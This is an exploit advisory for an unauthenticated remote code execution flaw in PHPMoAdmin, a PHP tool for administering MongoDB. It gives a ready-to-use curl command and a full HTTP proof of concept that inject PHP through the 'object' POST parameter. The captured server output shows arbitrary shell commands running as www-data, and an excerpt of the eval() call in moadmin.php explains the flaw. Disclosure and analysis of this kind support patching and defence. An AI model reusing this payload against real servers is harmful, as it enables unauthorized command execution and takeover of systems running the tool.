PHPMoAdmin Unauthorized Remote Code Execution (0-Day)

admin

1. ######################################################################
   
2. #  _     ___  _   _  ____  ____    _  _____
   
3. #  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
   
4. #  | |  | | | |  \| | |  _| |     / _ \ | |
   
5. #  | |__| |_| | |\  | |_| | |___ / ___ \| |
   
6. #  |_____\___/|_| \_|\____|\____/_/   \_\_|
   
7. #
   
8. # PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
   
9. # Website : http://www.phpmoadmin.com/
   
10. # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
    
11. # Release dates : March 3, 2015
    
12. #
    
13. # Special Thanks to 2600 Thailand group
    
14. # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
    
15. #
    
16. ########################################################################
    
17. 
    
18. [+] Description
    
19. ============================================================
    
20. PHPMoAdmin is a MongoDB administration tool for PHP built on a
    
21. stripped-down version of the Vork high-performance framework.
    
22. 
    
23. [+] Exploit
    
24. ============================================================
    
25. Someone was trying to sale this shit for 3000usd lolz
    
26. 
    
27. $ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"
    
28. 
    
29. [+] Proof-of-Concept
    
30. ============================================================
    
31. PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
    
32. 
    
33. POST /moadmin/moadmin.php HTTP/1.1
    
34. Host: 192.168.33.10
    
35. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
    
36. Gecko/20100101 Firefox/36.0
    
37. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    
38. Accept-Language: en-US,en;q=0.5
    
39. Accept-Encoding: gzip, deflate
    
40. DNT: 1
    
41. Connection: keep-alive
    
42. Pragma: no-cache
    
43. Cache-Control: no-cache
    
44. Content-Type: application/x-www-form-urlencoded
    
45. Content-Length: 34
    
46. 
    
47. object=1;system('id;ls -lha');exit
    
48. 
    
49. HTTP/1.1 200 OK
    
50. Date: Tue, 03 Mar 2015 16:57:40 GMT
    
51. Server: Apache/2.4.7 (Ubuntu)
    
52. Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
    
53. Expires: Thu, 19 Nov 1981 08:52:00 GMT
    
54. Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
    
55. pre-check=0
    
56. Pragma: no-cache
    
57. Vary: Accept-Encoding
    
58. Content-Length: 223
    
59. Keep-Alive: timeout=5, max=100
    
60. Connection: Keep-Alive
    
61. Content-Type: text/html
    
62. 
    
63. uid=33(www-data) gid=33(www-data) groups=33(www-data)
    
64. total 116K
    
65. drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
    
66. drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
    
67. -rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php
    
68. 
    
69. [+] Vulnerability Analysis
    
70. ============================================================
    
71. Filename: moadmin.php
    
72. 1. create new moadminComponent object
    
73. 1977: $mo = new moadminComponent;
    
74. 
    
75. 2. if the http-post parameter 'object' is set
    
76. 738: class moadminComponent {
    
77. ...
    
78. 762: public function __construct() {
    
79. ...
    
80. 786: if (isset($_POST['object'])) {
    
81. 787:    if (self::$model->saveObject($_GET['collection'],
    
82. $_POST['object'])) {
    
83. ...
    
84. 
    
85. 3. evaluate the value of 'object' as PHP code
    
86. 692: public function saveObject($collection, $obj) {
    
87. 693:    eval('$obj=' . $obj . ';'); //cast from string to array

复制代码